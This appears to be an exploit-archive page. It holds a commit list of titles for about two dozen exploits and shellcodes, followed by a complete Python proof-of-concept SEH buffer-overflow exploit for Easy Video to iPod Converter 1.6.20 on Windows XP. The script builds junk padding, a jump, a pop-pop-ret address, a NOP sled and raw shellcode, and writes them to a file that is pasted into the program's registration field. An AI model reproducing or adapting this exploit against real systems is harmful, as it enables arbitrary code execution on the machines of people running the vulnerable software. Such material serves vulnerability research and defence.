b68cbec24d
26 changes to exploits/shellcodes Sricam gSOAP 2.8 - Denial of Service Smart VPN 1.1.3.0 - Denial of Service (PoC) MySQL User-Defined (Linux) x32 / x86_64 - sys_exec Function Local Privilege Escalation Easy Video to iPod Converter 1.6.20 - Buffer Overflow (SEH) R 3.4.4 XP SP3 - Buffer Overflow (Non SEH) BEWARD Intercom 2.3.1 - Credentials Disclosure Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass) CloudMe Sync 1.11.2 Buffer Overflow - WoW64 - (DEP Bypass) Rundeck Community Edition < 3.0.13 - Persistent Cross-Site Scripting WordPress Plugin Ad Manager WD 1.0.11 - Arbitrary File Download AirTies Air5341 Modem 1.0.0.12 - Cross-Site Request Forgery LogonBox Limited / Hypersocket Nervepoint Access Manager - Unauthenticated Insecure Direct Object Reference CMSsite 1.0 - 'cat_id' SQL Injection CMSsite 1.0 - 'search' SQL Injection Cisco RV300 / RV320 - Information Disclosure Cisco Firepower Management Center 6.2.2.2 / 6.2.3 - Cross-Site Scripting Newsbull Haber Script 1.0.0 - 'search' SQL Injection Care2x 2.7 (HIS) Hospital Information System - Multiple SQL Injection Teameyo Project Management System 1.0 - SQL Injection Mess Management System 1.0 - SQL Injection MyBB IP History Logs Plugin 1.0.2 - Cross-Site Scripting ResourceSpace 8.6 - 'collection_edit.php' SQL Injection Linux/x86 - exit(0) Shellcode (5 bytes) Linux/x86 - Read /etc/passwd Shellcode (58 Bytes) (2) Linux/ARM - Reverse TCP (/bin/sh) - 192.168.1.124:4321 Shellcode (64 bytes) Linux/ARM - Bind TCP (/bin/sh)-0.0.0.0:4321 Null Free Shellcode (84 bytes)
27 lines
No EOL
853 B
Python
Executable file
27 lines
No EOL
853 B
Python
Executable file
# Exploit Title: Easy Video to iPod Converter - Local Buffer Overflow (SEH)
|
|
# Date: 2019-01-26
|
|
# Exploit Author: Nawaf Alkeraithe
|
|
# Twitter: @Alkeraithe1
|
|
# Vulnerable Software: Easy Video to iPod Converter 1.6.20
|
|
# Vendor Homepage: http://www.divxtodvd.net/
|
|
# Version: 1.6.20
|
|
# Software Link: http://www.divxtodvd.net/easy_video_to_ipod.exe
|
|
# Tested Windows XP SP3 x86
|
|
|
|
# PoC Steps
|
|
#1- run the program
|
|
#2- click on "Register"
|
|
#3- In the "Enter User Name" field, past the content of the payload, and click "OK"
|
|
|
|
|
|
junk = "A"*996
|
|
jmp = "\xEB\x06\x90\x90"
|
|
popPopRetAddr = "\x11\x7B\x03\x10"
|
|
NOPs = "\x90"*20;
|
|
shellCode = "\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0"
|
|
|
|
payload = junk + jmp + popPopRetAddr + NOPs + shellCode
|
|
|
|
exploitText = open("exploit.txt","w")
|
|
exploitText.write(payload)
|
|
exploitText.close() |